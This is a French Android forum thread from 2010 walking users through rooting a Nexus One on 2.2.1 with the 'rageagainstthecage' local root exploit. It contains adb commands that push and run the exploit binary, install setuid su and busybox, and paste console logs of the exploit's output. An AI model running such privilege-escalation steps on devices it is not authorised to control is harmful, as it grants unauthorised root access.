olboss Posté(e) 1 octobre 2010 Share Posté(e) 1 octobre 2010 (modifié) Si vous ne vous sentez pas de taille ou que l'expérience vous manque, vous êtes prié de quitter ce topic immédiatement. VOUS FAITES LES MODIFICATIONS A VOS RISQUES ET PERILS! Ni moi, ni Frandroid peut être tenu responsable. Bonjour, Avoir le root en étant en 2.2.1 sans débloquer son bootloader c'est maintenant possible. Découvert sur XDA hier, je vous fait la traduction aujourd'hui (Post original : http://forum.xda-developers.com/showthread.php?t=792016), je précise que je n'ai pas testé. Donc commencez par télécharger puis décompresser les fichiers nécessaire : -http://www.multiupload.com/VP4BDSF88F -http://www.multiupload.com/LF8VM8SDPX -Activez le déboguage USB : Paramètres-> Applications->Développement->Déboguage USB -Installez le SDK sur votre PC ([url]http://developer.android.com/sdk/[/url]) -Brancher votre Nexus One à votre PC -Depuis la console (Exécuter->cmd sous Windows), dirigez-vous dans le dossier tools du SDK (cd ) -Tapez "adb devices" et vérifiez que votre téléphone s'affiche bien -Tapez "adb push rageagainstthecage-arm5.bin /data/local/tmp/rageagainstthecage" (attention ici le fichier rageagainstthecage-arm5.bin doit etre dans le dossier tools du SDK) -Tapez "adb shell" -Tapez "chmod 700 /data/local/tmp/rageagainstthecage" -Tapez "cd /data/local/tmp" -Tapez "./rageagainstthecage". Ceci devrait s'afficher : ./rageagainstthecage[*] CVE-2010-EASY Android local root exploit (C) 2010 by 743C [*] checking NPROC limit ... [+] RLIMIT_NPROC={3084, 3084} [*] Searching for adb ... [+] Found adb as PID 64 [*] Spawning children. Dont type anything and wait for reset![*] [*] If you like what we are doing you can send us PayPal money to [*] 7-4-3-C[at]web.de so we can compensate time, effort and HW costs. [*] If you are a company and feel like you profit from our work,[*] we also accept donations > 1000 USD![*] [*] adb connection will be reset. restart adb server on desktop and re-login. -Tapez "adb kill-server" -Tapez "adb start-server" -Tapez "adb shell", un # devrait s'afficher, si ce n'est pas le cas tapez "adb remount", puis retapez "adb shell" -Tapez "exit" Nous allons maintenant installer Superuser, busybox et su -Tapez "adb remount" (pas obligatoire) -Tapez "adb shell" -Tapez "./busybox cp busybox /system/bin" -Tapez "chmod 4755 /system/bin/busybox" -Tapez "busybox cp Superuser.apk /system/app" -Tapez "busybox cp su /system/bin" -Tapez "chmod 4755 /system/bin/su" -Tapez "exit" On vérifie si cela à marcher : -Tapez "adb shell" -Tapez "su", un message de superuser doit s'afficher sur votre téléphone. -Tapez "exit" Voilà, vous êtes normalement root à ce moment là, je suppose que Universal Androot sera mis à jour bientôt pour supporté cet exploit. Édit (billcat74) : Modification du texte. Modifié 4 octobre 2010 par olboss Lien vers le commentaire Partager sur d’autres sites More sharing options...
KevinouILG Posté(e) 2 octobre 2010 Share Posté(e) 2 octobre 2010 Bonne nouvelle Merci ! Lien vers le commentaire Partager sur d’autres sites More sharing options...
mince Posté(e) 3 octobre 2010 Share Posté(e) 3 octobre 2010 (modifié) bonjours je vais vous exposez mon problème : -alors j ai telecharger le sdk , puis j ai double cliqué sur sdk manager . j ai fais installer les packages ( je les est tous installé.) puis je suis aller dans les gestionnaire de périphérique ou j ai fais mettre a jours les périphérique du nexus one en indiquant le chemin allant dans le dossier driver du sdk. [color=red][b]sa[/b][/color] m'a dit "windows à déterminer que le pilotes de voter périphérique est à jour" -j ai dé-zippée rageagainstthecage et l ai placé dans le dossier tools tel quel (le fichier intégrale ). _dans la commande j ai entré le chemin allant jusqu'au dossier tools et j ai placer mon téléphone en débogage. -j ai taper "adb devices" et [color=red][b]sa[/b][/color] m'a ecrit uniquement "liste of advices attached" (même si mon nexus et pas connecter cela marque la même chose.). -j ai tapé : "adb push rageagainstthecage-arm5.bin /data/local/tmp/rageagainstthecage" et [color=red][b]sa[/b][/color] m'a écrit :"error device not found" je suis donc complètement bloqué et peut donc rien faire :'( Édit 2 : @billcat tu pourrais m'expliquer ce que je dois faire.... Édit (billcat74) : Fusion des 3 messages à la suite. Il est inutile de poster 3 messages à la suite, il faut utiliser la fonction "Modifier". La prochaine fois, les messages seront supprimés sans préavis. Modifié 3 octobre 2010 par mince Lien vers le commentaire Partager sur d’autres sites More sharing options...
olboss Posté(e) 3 octobre 2010 Auteur Share Posté(e) 3 octobre 2010 C'est bizarre, t'es sur que t'a bien installer les pilotes du Nexus One parce que normalement en dessous de "list of devices attached", il devrait y avoir un numéro qui correspond a ton Nexus Lien vers le commentaire Partager sur d’autres sites More sharing options...
mince Posté(e) 3 octobre 2010 Share Posté(e) 3 octobre 2010 (modifié) bah justement je suis pas sur, j ai installer les driver sa sur ok mais justement je suis pas sur d avoir bien installé le pilotes regard comment j ai fais ... j ai juste intalled les packages c tout ... regard dans mon autre message ou j ai bien détaillé ce que j avais fais plise aidé moi :'( c peut être comment j utilise le sdk qui est pas bien . je ne vois nulle part que le sdk (sdk manager)fais référence au nexus one est-ce normal ? je suis sous windows 7 Modifié 3 octobre 2010 par mince Lien vers le commentaire Partager sur d’autres sites More sharing options...
olboss Posté(e) 3 octobre 2010 Auteur Share Posté(e) 3 octobre 2010 Fait clique droit sur ordinateur puis propriétés puis gestionnaire de périphériques et regarde si ton nexus est bien reconnu ou pas Lien vers le commentaire Partager sur d’autres sites More sharing options...
mince Posté(e) 3 octobre 2010 Share Posté(e) 3 octobre 2010 (modifié) oui dans "lecteurs de disque" j ai bien google,inc.nexus one usb driver" mais dans le poste de travaille j ai rien pas de disque dur ( il est en débogage usb) ps: quand dans gestionnaire de peripherique je fais propriété->mettre a jours le pilote-> windows 7 me dit"le meilleur pilote pour votre périphérique est deja insallée" et "windows a déterminé que le pilote de votre périphérique est à jours" ( pour mettre a jours le pilote je fais pointé vers le sdk.) il y a une option "désinstaller", le pilote ms avec entre parentèse "utilisateur experimenté" je doit le faire ????? plise et merci Modifié 3 octobre 2010 par mince Lien vers le commentaire Partager sur d’autres sites More sharing options...
kartouche Posté(e) 3 octobre 2010 Share Posté(e) 3 octobre 2010 Il ne faut pas que tu monte ton nexus one en périphérique de stockage externe, il faut juste le brancher en usb et le laisser en "charge" sans activer le transfert USB Lien vers le commentaire Partager sur d’autres sites More sharing options...
mince Posté(e) 3 octobre 2010 Share Posté(e) 3 octobre 2010 (modifié) ok j ai bien fais comme tu m as dit j ai pas activer le peripherique de stockage(tout en restant en mode débogage.) ms le problème reste le même au même endroit :mad: ps: as tu vu la dernière modification que j ai apporter a mon dernier message ou pas? sur désinstaller? (Quand je le connecte en debogage usd sans activer le stockage de masse il y a le "tada" de wondows qui apparaît et sa dit les pilotes sont a jours!! Je ne sais plus quoi penser ....) Modifié 3 octobre 2010 par mince Lien vers le commentaire Partager sur d’autres sites More sharing options...
kartouche Posté(e) 3 octobre 2010 Share Posté(e) 3 octobre 2010 Alors tu peux désinstaller le pilote et le réinstaller via le SDK SANS brancher ton nexus one. Il est possible que "7" t'ai fait une installation automatique d'un driver foireux dans quel cas une réinstallation propre peut résoudre le soucis Lien vers le commentaire Partager sur d’autres sites More sharing options...
mince Posté(e) 3 octobre 2010 Share Posté(e) 3 octobre 2010 (modifié) j ai un probleme quand je fais désinstaller le pilote ,le nexus one ne s'affiche plus nul part , je suis alors obligé de le débranchée .(je sais tu m as dit de surtoout pas faire sa mais impossible de le trouver). le nexus one réa-paré et tout reviens a la case départ comme si je n avais jamais désinstallé le pilote ... comment puis-je le trouver quand je désinstale le pilote (il n est plus la ou iil était : gestionnaire des peripherique->lecteur de disque .... je suis perdut impossible de le trouvé). ps je doit me mettre sur quoi quand je desinstalle le periphérique:-débogage usb uniquement -débogage usd +peripherique de stockage activer -peripherique de stoquage usb activer uniquement ??? Modifié 3 octobre 2010 par mince Lien vers le commentaire Partager sur d’autres sites More sharing options...
kartouche Posté(e) 3 octobre 2010 Share Posté(e) 3 octobre 2010 Branche ton N1, désinstalle le driver, débranche le immédiatement après, réinstalle le driver et après rebranche le (sans périphérique de stockage) Lien vers le commentaire Partager sur d’autres sites More sharing options...
mince Posté(e) 4 octobre 2010 Share Posté(e) 4 octobre 2010 (modifié) Les hommes parlent de la victoire comme d'une chancemais c'est le travail qui fait la victoire. Et sa j en suis la preuve vivante, du haut de tout mon weekend passé a essayer d'installé les driver j y suis finalement parvenu! Victoire me diriez vous ne parlons pas trop vites! 1ere etapes de mon long periple pour accéder au root, la route n est pas fini et sera certainement encore seméde nombreuses embuche! Car ne l oublions pas je suis encore un neophyte! Ps:(je fais une pause mes yeux rouge me font mal, et j ai quand meme un peux peur de la crise d épilepsie !) et excusé moi de vous avoir racontais ma vie mais je voulez partagé cet événement! @kartouche : merci beaucoup de ton aide :) ps : le dossier téléchargé "Superuser","busybox" et "su" ou doit t on les mettre ce n est pas spécifié ... (dans tools ?) et quand on commence la 2 ème étape ("Superuser","busybox"...) est-ce-que le chemin reste le même pointant vers tools ? C:\Users\René>cd \Users\René\Desktop\nexus one final\android-sdk-windows\tools C:\Users\René\Desktop\nexus one final\android-sdk-windows\tools>adb devices List of devices attached HT9CVP807632 device C:\Users\René\Desktop\nexus one final\android-sdk-windows\tools>adb push rageag instthecage-arm5.bin /data/local/tmp/rageagainstthecage 11 KB/s (5392 bytes in 0.465s) C:\Users\René\Desktop\nexus one final\android-sdk-windows\tools>adb shell $ chmod 700 /data/local/tmp/rageagainstthecage chmod 700 /data/local/tmp/rageagainstthecage $ cd /data/local/tmp cd /data/local/tmp $ ./rageagainstthecage ./rageagainstthecage [* ] CVE-2010-EASY Android local root exploit © 2010 by 743C [* ] checking NPROC limit ... [+ ] RLIMIT_NPROC={3084, 3084} [* ] Searching for adb ... [+ ] Found adb as PID 19959 [* ] Spawning children. Dont type anything and wait for reset! [* ] [* ] If you like what we are doing you can send us PayPal money to [* ] 7-4-3-C@web.de so we can compensate time, effort and HW costs. [* ] If you are a company and feel like you profit from our work, [* ] we also accept donations > 1000 USD! [* ] [* ] adb connection will be reset. restart adb server on desktop and re-login. adb kill-server adb kill-server $ adb: permission denied $ adb start-server adb start-server adb: permission denied $ C:\Users\René\Desktop\nexus one final\android-sdk-windows\tools>adb shell # adb shell adb shell adb: not found # adb remount adb remount adb: not found # Modifié 4 octobre 2010 par mince Lien vers le commentaire Partager sur d’autres sites More sharing options...
olboss Posté(e) 4 octobre 2010 Auteur Share Posté(e) 4 octobre 2010 Tu demande a un administrateur! Pour ton problème il faut que tu attende qu'il t'est redonner la main pour écrire adb kill-server (c'est à dire qu'il te raffiche ca "C:\Users\René\Desktop\nexus one final\android-sdk-windows\tools>" et ensuite si quand tu a fait adb shell et qu'il t'afficher le dièse ne retape pas adb shell! (j'ai modifier le tuto pour que ca fonctionne) Lien vers le commentaire Partager sur d’autres sites More sharing options...
mince Posté(e) 4 octobre 2010 Share Posté(e) 4 octobre 2010 (modifié) alors j ai une question pour savoir si j ai bien fait. -j ai mis dans tools le connue du dossier "RageAgainstTheCage" -j'ai mis dans tools les fichiers "Superuser","busybox" et "su" et [color=red][b]sa[/b][/color] nemarche pas j ai un message d'erreur: Microsoft Windows [version 6.1.7600] Copyright © 2009 Microsoft Corporation. Tous droits réservés. C:\Users\René>cd \Users\René\Desktop\nexus one final\android-sdk-windows\tools C:\Users\René\Desktop\nexus one final\android-sdk-windows\tools>adb devices List of devices attached HT9CVP807632 device C:\Users\René\Desktop\nexus one final\android-sdk-windows\tools>adb push rageaga instthecage-arm5.bin /data/local/tmp/rageagainstthecage 329 KB/s (5392 bytes in 0.016s) C:\Users\René\Desktop\nexus one final\android-sdk-windows\tools>adb shell $ chmod 700 /data/local/tmp/rageagainstthecage chmod 700 /data/local/tmp/rageagainstthecage $ cd /data/local/tmp cd /data/local/tmp $ ./rageagainstthecage ./rageagainstthecage [* ] CVE-2010-EASY Android local root exploit © 2010 by 743C [* ] checking NPROC limit ... [+] RLIMIT_NPROC={3084, 3084} [* ] Searching for adb ... [+] Found adb as PID 65 [* ] Spawning children. Dont type anything and wait for reset! [* ] [* ] If you like what we are doing you can send us PayPal money to [* ] 7-4-3-C@web.de so we can compensate time, effort and HW costs. [* ] If you are a company and feel like you profit from our work, [* ] we also accept donations > 1000 USD! [* ] [* ] adb connection will be reset. restart adb server on desktop and re-login. $ C:\Users\René\Desktop\nexus one final\android-sdk-windows\tools>adb kill-server C:\Users\René\Desktop\nexus one final\android-sdk-windows\tools>adb start-server * daemon not running. starting it now on port 5037 * * daemon started successfully * C:\Users\René\Desktop\nexus one final\android-sdk-windows\tools>adb shell # exit exit C:\Users\René\Desktop\nexus one final\android-sdk-windows\tools>adb remount remount failed: Operation not permitted C:\Users\René\Desktop\nexus one final\android-sdk-windows\tools>adb shell # ./busybox cp busybox /system/bin ./busybox cp busybox /system/bin ./busybox: not found # Modifié 4 octobre 2010 par mince Lien vers le commentaire Partager sur d’autres sites More sharing options...
olboss Posté(e) 4 octobre 2010 Auteur Share Posté(e) 4 octobre 2010 busybox n'est pas dans un sous dossier, il est bien directement dans tools? Si ca marche pas met busybox sur ta carte sd et tu fait ceci pour mettre superuser su et busybox -Tapez "adb remount" (pas obligatoire) -Tapez "adb shell" -Tapez "cd /mnt/sdcard/" -Tapez "./busybox cp busybox /system/bin" -Tapez "cd /" -Tapez "chmod 4755 /system/bin/busybox" -Tapez "busybox cp Superuser.apk /system/app" -Tapez "busybox cp su /system/bin" -Tapez "chmod 4755 /system/bin/su" -Tapez "exit" On vérifie si cela à marcher : -Tapez "adb shell" -Tapez "su", un message de superuser doit s'afficher sur votre téléphone. -Tapez "exit" Lien vers le commentaire Partager sur d’autres sites More sharing options...
mince Posté(e) 4 octobre 2010 Share Posté(e) 4 octobre 2010 (modifié) toujours le même probleme !!! j ai bien déplace les fichier vers la sd mais le problème semble persister! C:\Users\René\Desktop\nexus one final\android-sdk-windows\tools>adb push rageaga instthecage-arm5.bin /data/local/tmp/rageagainstthecage 59 KB/s (5392 bytes in 0.089s) C:\Users\René\Desktop\nexus one final\android-sdk-windows\tools>adb shell # chmod 700 /data/local/tmp/rageagainstthecage chmod 700 /data/local/tmp/rageagainstthecage # cd /data/local/tmp cd /data/local/tmp # ./rageagainstthecage ./rageagainstthecage [* ] CVE-2010-EASY Android local root exploit © 2010 by 743C [* ] checking NPROC limit ... [+] RLIMIT_NPROC={3084, 3084} [* ] Searching for adb ... [+] Found adb as PID 4237 [* ] Spawning children. Dont type anything and wait for reset! [* ] [* ] If you like what we are doing you can send us PayPal money to [* ] 7-4-3-C@web.de so we can compensate time, effort and HW costs. [* ] If you are a company and feel like you profit from our work, [* ] we also accept donations > 1000 USD! [* ] [* ] adb connection will be reset. restart adb server on desktop and re-login. # C:\Users\René\Desktop\nexus one final\android-sdk-windows\tools>adb kill-server C:\Users\René\Desktop\nexus one final\android-sdk-windows\tools>adb kill-server C:\Users\René\Desktop\nexus one final\android-sdk-windows\tools>adb start-server * daemon not running. starting it now on port 5037 * * daemon started successfully * C:\Users\René\Desktop\nexus one final\android-sdk-windows\tools>adb shell $ exit exit C:\Users\René\Desktop\nexus one final\android-sdk-windows\tools>adb remount remount failed: Operation not permitted C:\Users\René\Desktop\nexus one final\android-sdk-windows\tools>adb shell $ cd /mnt/sdcard/ cd /mnt/sdcard/ $ ./busybox cp busybox /system/bin ./busybox cp busybox /system/bin ./busybox: permission denied $ cd / cd / $ chmod 4755 /system/bin/busybox chmod 4755 /system/bin/busybox Unable to chmod /system/bin/busybox: No such file or directory Modifié 4 octobre 2010 par mince Lien vers le commentaire Partager sur d’autres sites More sharing options...
olboss Posté(e) 4 octobre 2010 Auteur Share Posté(e) 4 octobre 2010 Après le "cd /mnt/sdcard" fait un "chmod 7777 busybox" Lien vers le commentaire Partager sur d’autres sites More sharing options...
mince Posté(e) 4 octobre 2010 Share Posté(e) 4 octobre 2010 même probleme : C:\Users\René\Desktop\nexus one final\android-sdk-windows\tools>adb shell # cd /mnt/sdcard/ cd /mnt/sdcard/ # chmod 7777 busybox chmod 7777 busybox Unable to chmod busybox: Operation not permitted # Lien vers le commentaire Partager sur d’autres sites More sharing options...
olboss Posté(e) 4 octobre 2010 Auteur Share Posté(e) 4 octobre 2010 (modifié) Essaye plutôt "chmod 4755 busybox" Ne recommence pas le tuto a chaque fois sinon tu perd le root une fois que tu as le dièse tu n'a plus besoin de faire les explication du premier cadrz Modifié 4 octobre 2010 par olboss Lien vers le commentaire Partager sur d’autres sites More sharing options...
mince Posté(e) 4 octobre 2010 Share Posté(e) 4 octobre 2010 même probleme :( Lien vers le commentaire Partager sur d’autres sites More sharing options...
olboss Posté(e) 4 octobre 2010 Auteur Share Posté(e) 4 octobre 2010 Regarde mon message d'en dessus je l'ai modifié Pour ton problème tu peux copiez toi même les fichiers a l'endroit qu'il faut avec rootexplorer Lien vers le commentaire Partager sur d’autres sites More sharing options...
mince Posté(e) 4 octobre 2010 Share Posté(e) 4 octobre 2010 (modifié) il se trouve sur le market rootexporer ? comment je l'utilise ? merci;) ps je n ai pas devsoin de faire les explication du 1é cadre même si je debranche mon tel ou pas ? Modifié 4 octobre 2010 par mince Lien vers le commentaire Partager sur d’autres sites More sharing options...
olboss Posté(e) 4 octobre 2010 Auteur Share Posté(e) 4 octobre 2010 Ah oui oui tu le trouve sur le market, il est payant, en suite tu copie le fichier busybox su et superuser au bonne endroit et apreès tu tapera juste les commande avec chmod du tuto de base Édit (billcat74) : Modification du texte. L'incitation au piratage n'est pas autorisé sur le forum. C'est le premier et dernier avertissement. Lien vers le commentaire Partager sur d’autres sites More sharing options...
mince Posté(e) 4 octobre 2010 Share Posté(e) 4 octobre 2010 (modifié) pourrais tu me dire ou le mettre au bonne endroit, tu pe me guider ...ou je doit les mettre exactement merci ps je n ai pas besoin de faire les modification du 1 é cadre même si je débranche mon tel ? putin de 2.2.1 !! Édit (billcat74) : Modification du texte. L'incitation au piratage et le téléchargement d'application payante n'est pas autorisé sur le forum. C'est le premier et dernier avertissement. ON AIDE PAS LES PERSONNES QUI TÉLÉCHARGENT ILLÉGALEMENT DES APPLICATIONS. Modifié 4 octobre 2010 par mince Lien vers le commentaire Partager sur d’autres sites More sharing options...
Recommended Posts